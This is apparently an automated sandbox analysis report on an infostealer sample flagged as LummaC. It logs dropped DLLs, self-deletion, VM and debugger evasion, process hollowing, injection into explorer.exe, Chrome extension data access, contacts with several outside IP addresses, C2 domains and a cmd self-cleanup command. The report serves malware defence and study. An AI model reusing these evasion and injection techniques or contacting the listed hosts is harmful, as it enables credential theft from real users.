Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00441DE9 push ebp; ret	6_2_00441E02
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00441FE4 pushad ; retf 0041h	6_2_00441FE5
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0211030D push ecx; ret	6_2_02110315
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429B010 push edx; ret	8_2_0429B21F
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429A910 push edx; ret	8_2_0429A91B

Drops PE files

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F441.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\msvcp140.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9EDA.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\sdveeeu	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	File created: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File created: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sdveeeu

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\4.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\F441.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: sdveeeu, 00000005.00000002.1997292186.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKG

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_00503F97 rdtsc

6_2_00503F97

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1746	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 719	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3159	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 856	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Dropped PE file which has not been started: C:\ProgramData\HJJJECFIECBG\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 6344	Thread sleep count: 363 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep count: 1746 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep time: -174600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6364	Thread sleep count: 719 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6364	Thread sleep time: -71900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3220	Thread sleep count: 259 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2872	Thread sleep count: 295 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep count: 327 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3736	Thread sleep time: -32700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep count: 3159 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5460	Thread sleep time: -315900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 5496	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe TID: 3328	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3900	Thread sleep count: 59 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFAEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

9_2_6CFAEBF0

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1695468211.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareyst^
Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: kat796E.tmp, 00000009.00000002.2826699308.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHA
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.000000000982D000.00000004.00000001.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000052A000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.0000000000894000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW&
Source: kat796E.tmp, 00000009.00000002.2829304826.0000000005170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 00000001.00000000.1695468211.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1692944152.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1694837986.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\4.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\4.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\4.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	System information queried: CodeIntegrityInformation			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\4.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_00503F97 rdtsc

6_2_00503F97

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\4.exe

Code function: 0_2_00402A9F LdrLoadDll,

0_2_00402A9F

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6D07AC62

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD0D90 mov eax, dword ptr fs:[00000030h]	0_2_02DD0D90
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02DD092B mov eax, dword ptr fs:[00000030h]	0_2_02DD092B
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_02EF19AA push dword ptr fs:[00000030h]	0_2_02EF19AA
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E10D90 mov eax, dword ptr fs:[00000030h]	5_2_02E10D90
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_02E1092B mov eax, dword ptr fs:[00000030h]	5_2_02E1092B
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_030113E2 push dword ptr fs:[00000030h]	5_2_030113E2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004FED1B push dword ptr fs:[00000030h]	6_2_004FED1B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F092B mov eax, dword ptr fs:[00000030h]	6_2_020F092B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_020F0D90 mov eax, dword ptr fs:[00000030h]	6_2_020F0D90

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6D07AC62

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 9EDA.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.28.110.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.18.245.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

8_2_0429A4F0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\4.exe	Thread created: C:\Windows\explorer.exe EIP: 87C19E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Thread created: unknown EIP: 34119E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: F441.exe	String found in binary or memory: zippyfinickysofwps.shop
Source: F441.exe	String found in binary or memory: obsceneclassyjuwks.shop
Source: F441.exe	String found in binary or memory: acceptabledcooeprs.shop
Source: F441.exe	String found in binary or memory: whispedwoodmoodsksl.shop
Source: F441.exe	String found in binary or memory: boredimperissvieos.shop
Source: F441.exe	String found in binary or memory: holicisticscrarws.shop
Source: F441.exe	String found in binary or memory: sweetsquarediaslw.shop
Source: F441.exe	String found in binary or memory: plaintediousidowsko.shop
Source: F441.exe	String found in binary or memory: miniaturefinerninewjs.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\4.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\4.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sdveeeu	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\kat796E.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat796E.tmp base: 641000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Process created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

9_2_6D0C4760

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

9_2_6CFA1C30

Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1692760853.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1694837986.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
